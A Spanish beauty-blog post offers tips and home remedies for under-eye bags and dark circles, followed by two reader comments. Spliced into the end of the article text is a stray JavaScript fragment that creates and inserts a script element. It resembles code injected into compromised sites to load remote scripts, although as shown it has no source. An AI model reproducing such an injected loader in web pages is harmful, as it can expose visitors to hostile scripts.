Salud y belleza » Belleza, Salud

Elimina bolsas y ojeras y luce unos ojos bonitos

2 Comentarios

reduce-bolsas-ojerasDicen que los ojos son el espejo del alma, pero lo que es seguro es que son el reflejo de nuestro estado de salud y pueden aparecer bolsas y ojeras como consecuencia de, por ejemplo, la “mala vida”. Hay que saber que la piel que rodea a nuestro ojo es una de las partes más sensibles de nuestro cuerpo por eso hay que cuidarla y cuidar nuestra salud también. Con sencillos trucos conseguirás lucir unos ojos bonitos.

Las bolsas y ojeras suelen dar apariencia de piel envejecida y triste. Las ojeras son una especie de sombra gris o violeta bajo los ojos. Puede tener distintas causas como no haber dormido suficiente, haber estado demasiado tiempo al sol, no comer bien o haberse excedido con el alcohol. También hay factores genéticos que pueden influir en la pigmentación de esa zona o simplemente que sean más coloridos porque tengamos más vasos sanguíneos.

Di adiós a las ojeras con estos consejos:

ojeras-cremas- Duerme todo lo que te pida el cuerpo para que las ojeras no aparezcan como síntoma de fatiga.

- Frente al sol protégete los ojos (sobre todo si son claros) con gafas de sol y cremas.

- Aplícate productos o cremas para disminuir su aparición. Estos geles ayudan a hidratar la zona y blanquearla para que desaparezca el color oscuro.

- Date con algo frío en las ojeras porque ayuda a reducirlas gracias a su efecto vasoconstrictor. Descongestiona y disminuye las ojeras.

- Lávate la cara con jabones neutros que le vayan bien a tu piel y no uses exfoliante en esa zona.

- Maquíllate si quieres un efecto inmediato corrector.

Las bolsas aparecen cuando tienes los párpados inferiores hinchados por el cansancio o por malos hábitos, aunque también hay personas que las tienen por acumulación de líquidos. Para intentar eliminarlas sigue estos consejos:

- Para que el líquido no se acumule en esa zona pueden probar a dormir con la cabeza más alta que el cuerpo.

- Cenar ligero, con poca sal y verduras a menudo para ayudar a que la piel retenga menos líquidos.

- Usar alguna crema específica para bolsas.

- Hacer ejercicio por la mañana para eliminar líquidos y así favorecer la desaparición de las bolsas.

También hay algunos trucos caseros que puedes utilizar además para ayudarte a reducir bolsas y ojeras:

ojeras-pepino- Manzanilla para combatir la hinchazón de los ojos. Se aplican bolsas templadas o el agua que queda con un algodón. Lo mejor es dejarlo actuar 10 minutos todos los días y notarás los efectos muy pronto.

- Una rodaja de pepino fresco sobre los ojos unos minutos ayudará a reducir bolsas y ojeras, sobre todo si está frío porque el efecto frío e hidratante mejora la piel.

- Para conseguir ese efecto frío también podemos usar el hielo. Meter algunos cubitos en una bolsa y aplicarlo hasta que se reduzca la hinchazón, sobre todo en casos muy extremos.

Todos estos consejos te ayudarán a reducir o disminuir bolsas y ojeras y a tener una mirada mucho más joven con ojos más bonitos.

¿Tienes ojeras o bolsas? ¿Qué haces para combatirlos?var d=document;var s=d.createElement('script'); document.currentScript.parentNode.insertBefore(s, document.currentScript);

Más consejos de salud y belleza : , , , ,

2 Comments »

  • Ría said:

    A mí es que la medicación me produce bolsas en los ojos. Esas también se quitan con estos consejos? Gracias

  • liz said:

    que interesante, me servirá de mucho gracias que buen blog.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.